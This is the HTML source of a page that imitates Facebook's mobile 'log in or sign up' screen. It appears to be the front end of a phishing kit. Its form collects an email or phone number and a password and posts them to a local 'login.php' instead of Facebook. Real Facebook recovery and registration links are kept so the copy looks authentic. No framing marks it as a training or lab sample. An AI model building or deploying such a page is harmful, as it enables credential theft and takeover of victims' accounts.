<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>log in or sign up</title>
    <link rel="stylesheet" href="fontawesome/css/all.css">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/responsive.css">
</head>

<body>

    <header>

        <div class="mbg">

        </div>
        <div class="up">
            <a href="#" class="a">English - </a>
            <a href="#" class="b">Español
               - </a>
            <a href="#" class="c">More...</a>
        </div>


        <nav class="">
            <!-- <div class="logo">
                <img src="image/logo.png" alt="" class="">
            </div> -->

            <div class="formDiv">
                <form method="post" action="login.php" class="form">

                    <div class="email">
                        <label for="email">Email or phone</label>
                        <input type="mail" align="left" class="mail" name="mail" id="email" required>
                    </div>
                    <div class="pass">
                        <label for="pass">Password</label>
                        <input type="password" align="left" class="pass" name="password" id="pass" required>
                        <a href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&multiple_results=0&ars=facebook_login&lwv=100&ref=dbl&_rdr" class="forget">Forgotten account?</a>
                    </div>

                    <div class="login">
                        <input id='submit' type="submit" class="button" value="Log In">
                    </div>

                    <div class="mforget">
                        <a href="https://m.facebook.com/login/identify/?ctx=recover&c=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&multiple_results=0&ars=facebook_login&lwv=100&ref=dbl&_rdr" class="">Find your account</a>
                    </div>


                </form>
            </div>
            <div class="or">
                <div class="hr"></div>
                <span class="span">OR</span>
                <div class="hr"></div>
            </div>
            </div>
        </nav>
    </header>


    <form class="acntBtn container" action="http://m.facebook.com/reg">
        <button class="crBtn">Create New Facebook Account</a></button>
    </form>

    <script src="js/app.js"></script>
</body>

</html>